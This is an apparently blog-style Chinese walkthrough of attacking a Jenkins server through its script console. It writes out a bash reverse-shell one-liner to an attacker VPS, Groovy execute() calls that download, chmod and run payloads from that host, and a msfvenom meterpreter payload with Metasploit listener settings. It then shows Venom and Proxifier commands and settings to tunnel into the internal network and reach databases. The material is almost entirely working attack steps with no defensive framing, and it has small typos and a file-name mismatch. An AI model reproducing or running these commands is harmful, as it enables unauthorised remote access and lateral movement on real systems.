Bash反弹
1.在vps上新建文件,写入bash反弹shell一句话,并起web服务。
#bash反弹shell一句话
vim poc:
bash -i >& /dev/tcp/vpsip/port 0>&1
#起web服务
Pyhto3 -m http.server 8080
2.下载poc到Jenkins服务器
println "wget http://vpsip:8080/s.py -P /".execute().text
3.给文件赋权
println "chmod 777 poc".execute().text
4监听
nc -lvvp port
5.执行
println "/bin/bash ./poc".execute().text
6.获得shell
MSF反弹
1.生成linux后门,并起web服务。
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=vpsip LPORT=4444 -f elf > exp.elf
2.下载elf文件到Jenkins服务器,并给文件赋权。
println “wget http://vpsip:8080/exp.elf -P /”.execute().text
println “chmod 777 exp.elf”.execute().text
3.设置MSF监听
use exploit/multi/handler #使用监听模块
set payload linux/x64/meterpreter/reverse_tcp #使用和木马相同的payload
set lhost vpsip #kaili 的ip
set lport 4444 #木马的端口
exploit #执行
4.执行
println “/bin/bash ./poc”.execute().text
5.获得meterpreter
Vemon代理
Vemon按照前述方法,将agent_linxu_x64上传到目标机器,赋权后执行
./agent_linux_x64 -rhost vpsip -rport 5555
将admin_linxu_x64上传到VPS,赋权后执行
./admin_linux_x64 -lport 5555
设置代理成功
将vps的流量代理到本机,vps执行:
#goto 1
#socks 8080
>>>a socks5 proxy of the target node has started up on the local port 8080.
在burp中User options中SOCKS Proxy中设置公网IP和代理端口,记得关闭Proxy-options中的监听。使用Proxy-Intercept-Open Browser浏览器即可访问其他内网web服务。
Proxifier
在配置文件-代理服务器中,配置vpsip和端口,选择SOCKS5,并确定。在代理规则中,添加需要代理的应用,动作选择刚才设置的代理,并确定。此处将Navicat,MDAT设置走代理,之后连接内网其他主机的数据库,连接成功。可以查看表格和执行命令。
proxifier设置需要代理的软件不用写路径。代理jar工具,添加javax.exe即可,工具需要使用java -jar xxx.jar打开,在cmd中运行的工具,如ssh,不是添加cmd.exe,而是ssh.exe。
参考资料:
https://blog.csdn.net/zsw15841822890/article/details/109030409